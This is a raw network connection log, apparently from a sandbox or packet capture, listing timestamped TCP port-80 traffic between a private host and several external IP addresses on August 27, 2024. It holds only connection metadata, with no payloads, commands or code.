Aug 27, 2024 17:48:01.387629032 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.450898886 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.451034069 CEST	49826	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:48:02.593189001 CEST	49826	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:48:03.612251043 CEST	49827	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:48:03.713675022 CEST	80	49827	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:03.713843107 CEST	49827	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:48:03.719196081 CEST	49827	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:48:03.850480080 CEST	80	49827	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:03.891381025 CEST	80	49827	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:03.891988039 CEST	80	49827	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:03.892086983 CEST	49827	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:48:03.893714905 CEST	49827	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:48:03.995460033 CEST	80	49827	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:09.447587967 CEST	49828	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:09.671469927 CEST	80	49828	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:09.671668053 CEST	49828	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:09.679625034 CEST	49828	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:09.906615973 CEST	80	49828	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:09.906771898 CEST	49828	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:11.184850931 CEST	49828	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:12.203107119 CEST	49829	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:12.426323891 CEST	80	49829	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:12.426568985 CEST	49829	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:12.434484005 CEST	49829	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:12.659853935 CEST	80	49829	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:12.659987926 CEST	49829	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:13.949853897 CEST	49829	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:14.967498064 CEST	49830	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:15.191550970 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.191833019 CEST	49830	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:15.200889111 CEST	49830	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:15.200937986 CEST	49830	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:15.200989962 CEST	49830	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:15.429493904 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.429632902 CEST	49830	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:15.429682016 CEST	49830	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:15.429946899 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.429964066 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.430154085 CEST	49830	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:15.430154085 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.430371046 CEST	49830	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:15.430450916 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.430541992 CEST	49830	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:15.430612087 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.430762053 CEST	49830	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:15.430963039 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.431101084 CEST	49830	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:15.431168079 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.431442976 CEST	49830	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:15.431638002 CEST	49830	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:15.654354095 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.654401064 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.654544115 CEST	49830	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:15.654593945 CEST	49830	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:15.655484915 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.655623913 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.655690908 CEST	49830	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:15.655746937 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.655869961 CEST	49830	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:15.655917883 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.656016111 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.656040907 CEST	49830	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:15.656109095 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.656265020 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.656368017 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.656486988 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.878432989 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.878525972 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.878642082 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.878771067 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.879601002 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.879707098 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.879921913 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.880022049 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.882319927 CEST	80	49830	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:15.882564068 CEST	49830	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:16.714812994 CEST	49830	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:17.732472897 CEST	49831	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:17.956233978 CEST	80	49831	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:17.956382036 CEST	49831	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:17.961724997 CEST	49831	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:18.187541962 CEST	80	49831	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:18.187876940 CEST	49831	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:18.189903975 CEST	49831	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:48:18.413553953 CEST	80	49831	85.159.66.93	192.168.11.20
Aug 27, 2024 17:48:31.491107941 CEST	49832	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:31.592530966 CEST	80	49832	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:31.592655897 CEST	49832	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:31.600583076 CEST	49832	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:31.702033997 CEST	80	49832	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:31.702380896 CEST	80	49832	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:31.702486992 CEST	80	49832	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:31.702584982 CEST	49832	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:33.101830959 CEST	49832	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:34.119436979 CEST	49833	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:34.221451998 CEST	80	49833	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:34.221673965 CEST	49833	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:34.229645967 CEST	49833	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:34.331362009 CEST	80	49833	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:34.331727028 CEST	80	49833	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:34.331793070 CEST	80	49833	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:34.331911087 CEST	49833	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:35.741877079 CEST	49833	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:36.762064934 CEST	49834	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:36.863392115 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:36.863719940 CEST	49834	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:36.881314039 CEST	49834	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:36.881349087 CEST	49834	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:36.881406069 CEST	49834	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:36.983000994 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:36.983012915 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:36.983105898 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:36.983222008 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:36.983232021 CEST	49834	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:36.983318090 CEST	49834	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:36.983366013 CEST	49834	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:36.983536005 CEST	49834	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:37.086822033 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.086834908 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.086843014 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.086850882 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.086858034 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.086865902 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.086874008 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.086880922 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.086889029 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.086896896 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.086904049 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.086911917 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.086920023 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.086927891 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.086987972 CEST	49834	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:37.087038994 CEST	49834	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:37.087256908 CEST	49834	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:37.196997881 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.197016001 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.197025061 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.197032928 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.197041035 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.197047949 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.197056055 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.197063923 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.197072029 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.197078943 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.197087049 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.197094917 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.197104931 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.197113037 CEST	80	49834	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:37.197277069 CEST	49834	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:38.397660971 CEST	49834	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:39.415138960 CEST	49835	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:39.516860962 CEST	80	49835	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:39.517044067 CEST	49835	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:39.522396088 CEST	49835	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:39.623925924 CEST	80	49835	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:39.624238968 CEST	80	49835	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:39.624370098 CEST	80	49835	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:39.624597073 CEST	49835	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:39.626640081 CEST	49835	80	192.168.11.20	3.82.56.39
Aug 27, 2024 17:48:39.727965117 CEST	80	49835	3.82.56.39	192.168.11.20
Aug 27, 2024 17:48:44.863317966 CEST	49836	80	192.168.11.20	172.96.191.39
Aug 27, 2024 17:48:45.195338011 CEST	80	49836	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:45.195523977 CEST	49836	80	192.168.11.20	172.96.191.39
Aug 27, 2024 17:48:45.206881046 CEST	49836	80	192.168.11.20	172.96.191.39
Aug 27, 2024 17:48:45.538733959 CEST	80	49836	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:45.539205074 CEST	80	49836	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:45.539215088 CEST	80	49836	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:45.539361954 CEST	49836	80	192.168.11.20	172.96.191.39
Aug 27, 2024 17:48:46.708234072 CEST	49836	80	192.168.11.20	172.96.191.39
Aug 27, 2024 17:48:47.725877047 CEST	49837	80	192.168.11.20	172.96.191.39
Aug 27, 2024 17:48:48.049213886 CEST	80	49837	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:48.049447060 CEST	49837	80	192.168.11.20	172.96.191.39
Aug 27, 2024 17:48:48.061391115 CEST	49837	80	192.168.11.20	172.96.191.39
Aug 27, 2024 17:48:48.384721994 CEST	80	49837	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:48.385226011 CEST	80	49837	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:48.385366917 CEST	80	49837	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:48.385538101 CEST	49837	80	192.168.11.20	172.96.191.39
Aug 27, 2024 17:48:49.566895008 CEST	49837	80	192.168.11.20	172.96.191.39
Aug 27, 2024 17:48:50.584522963 CEST	49838	80	192.168.11.20	172.96.191.39
Aug 27, 2024 17:48:50.916059017 CEST	80	49838	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:50.916240931 CEST	49838	80	192.168.11.20	172.96.191.39
Aug 27, 2024 17:48:50.929811954 CEST	49838	80	192.168.11.20	172.96.191.39
Aug 27, 2024 17:48:50.929861069 CEST	49838	80	192.168.11.20	172.96.191.39
Aug 27, 2024 17:48:50.929925919 CEST	49838	80	192.168.11.20	172.96.191.39
Aug 27, 2024 17:48:51.261565924 CEST	80	49838	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:51.261645079 CEST	80	49838	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:51.261825085 CEST	49838	80	192.168.11.20	172.96.191.39
Aug 27, 2024 17:48:51.261888981 CEST	80	49838	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:51.261898041 CEST	49838	80	192.168.11.20	172.96.191.39
Aug 27, 2024 17:48:51.261953115 CEST	49838	80	192.168.11.20	172.96.191.39
Aug 27, 2024 17:48:51.262048960 CEST	80	49838	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:51.262427092 CEST	80	49838	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:51.262443066 CEST	49838	80	192.168.11.20	172.96.191.39
Aug 27, 2024 17:48:51.262449026 CEST	80	49838	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:51.262577057 CEST	80	49838	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:51.593772888 CEST	80	49838	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:51.593858004 CEST	80	49838	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:51.594007969 CEST	80	49838	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:51.594326019 CEST	80	49838	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:51.594449043 CEST	80	49838	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:51.594456911 CEST	80	49838	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:53.459001064 CEST	49839	80	192.168.11.20	172.96.191.39
Aug 27, 2024 17:48:53.789486885 CEST	80	49839	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:53.789632082 CEST	49839	80	192.168.11.20	172.96.191.39
Aug 27, 2024 17:48:53.795021057 CEST	49839	80	192.168.11.20	172.96.191.39
Aug 27, 2024 17:48:54.125672102 CEST	80	49839	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:54.125811100 CEST	80	49839	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:54.125912905 CEST	80	49839	172.96.191.39	192.168.11.20
Aug 27, 2024 17:48:54.126205921 CEST	49839	80	192.168.11.20	172.96.191.39
Aug 27, 2024 17:48:54.130899906 CEST	49839	80	192.168.11.20	172.96.191.39
Aug 27, 2024 17:48:54.461389065 CEST	80	49839	172.96.191.39	192.168.11.20
Aug 27, 2024 17:49:00.362385988 CEST	49840	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:00.525010109 CEST	80	49840	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:00.525142908 CEST	49840	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:00.533078909 CEST	49840	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:00.695652008 CEST	80	49840	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:01.170279980 CEST	80	49840	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:01.170337915 CEST	80	49840	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:01.170388937 CEST	80	49840	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:01.170460939 CEST	49840	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:01.170465946 CEST	80	49840	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:01.170577049 CEST	49840	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:01.177611113 CEST	80	49840	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:01.177710056 CEST	80	49840	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:01.177721977 CEST	80	49840	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:01.177882910 CEST	49840	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:01.192244053 CEST	80	49840	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:01.192264080 CEST	80	49840	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:01.192390919 CEST	49840	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:01.198611021 CEST	80	49840	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:01.198625088 CEST	80	49840	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:01.198772907 CEST	49840	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:02.048520088 CEST	49840	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:03.066267014 CEST	49841	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:03.229259014 CEST	80	49841	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:03.229408026 CEST	49841	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:03.237301111 CEST	49841	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:03.400342941 CEST	80	49841	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:04.751068115 CEST	49841	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:04.954287052 CEST	80	49841	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:05.427855968 CEST	80	49841	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:05.427947998 CEST	80	49841	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:05.428066969 CEST	49841	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:05.428075075 CEST	80	49841	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:05.428087950 CEST	80	49841	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:05.428127050 CEST	49841	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:05.428289890 CEST	49841	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:05.428289890 CEST	49841	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:05.429672956 CEST	80	49841	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:05.429780960 CEST	80	49841	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:05.429887056 CEST	80	49841	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:05.429938078 CEST	49841	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:05.430002928 CEST	49841	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:05.495407104 CEST	80	49841	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:05.495419025 CEST	80	49841	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:05.495598078 CEST	49841	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:05.495598078 CEST	49841	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:05.507567883 CEST	80	49841	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:05.507740021 CEST	49841	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:05.507898092 CEST	80	49841	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:05.508018017 CEST	49841	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:05.768737078 CEST	49842	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:05.931612015 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:05.931782007 CEST	49842	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:05.940876007 CEST	49842	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:05.940927029 CEST	49842	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:05.940974951 CEST	49842	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:06.103809118 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:06.103981972 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:06.103986979 CEST	49842	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:06.104172945 CEST	49842	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:06.104258060 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:06.104343891 CEST	49842	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:06.104682922 CEST	49842	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:06.104851007 CEST	49842	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:06.267220020 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:06.267389059 CEST	49842	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:06.267436981 CEST	49842	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:06.267488003 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:06.267700911 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:06.267836094 CEST	49842	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:06.267915964 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:06.268110037 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:06.430227041 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:06.430351019 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:06.430485964 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:06.430726051 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:06.430854082 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:06.430972099 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:07.268532991 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:07.268631935 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:07.268646955 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:07.268733025 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:07.268791914 CEST	49842	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:07.268925905 CEST	49842	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:07.275839090 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:07.275960922 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:07.275974035 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:07.276150942 CEST	49842	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:07.290144920 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:07.290159941 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:07.290333033 CEST	49842	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:07.296720982 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:07.296854973 CEST	49842	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:07.298238039 CEST	80	49842	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:07.298432112 CEST	49842	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:07.453577042 CEST	49842	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:08.471573114 CEST	49843	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:08.634335041 CEST	80	49843	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:08.634476900 CEST	49843	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:08.639863968 CEST	49843	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:08.802630901 CEST	80	49843	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:09.210969925 CEST	80	49843	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:09.211162090 CEST	80	49843	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:09.211329937 CEST	49843	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:09.215312958 CEST	49843	80	192.168.11.20	148.135.49.178
Aug 27, 2024 17:49:09.377897024 CEST	80	49843	148.135.49.178	192.168.11.20
Aug 27, 2024 17:49:22.509526968 CEST	49844	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:22.610229969 CEST	80	49844	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:22.610416889 CEST	49844	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:22.618396044 CEST	49844	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:22.719060898 CEST	80	49844	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:22.720415115 CEST	80	49844	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:22.720571041 CEST	49844	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:24.121834993 CEST	49844	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:24.224113941 CEST	80	49844	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:25.139390945 CEST	49845	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:25.248478889 CEST	80	49845	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:25.248742104 CEST	49845	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:25.256726027 CEST	49845	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:25.362453938 CEST	80	49845	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:25.365128040 CEST	80	49845	3.33.130.190	192.168.11.20
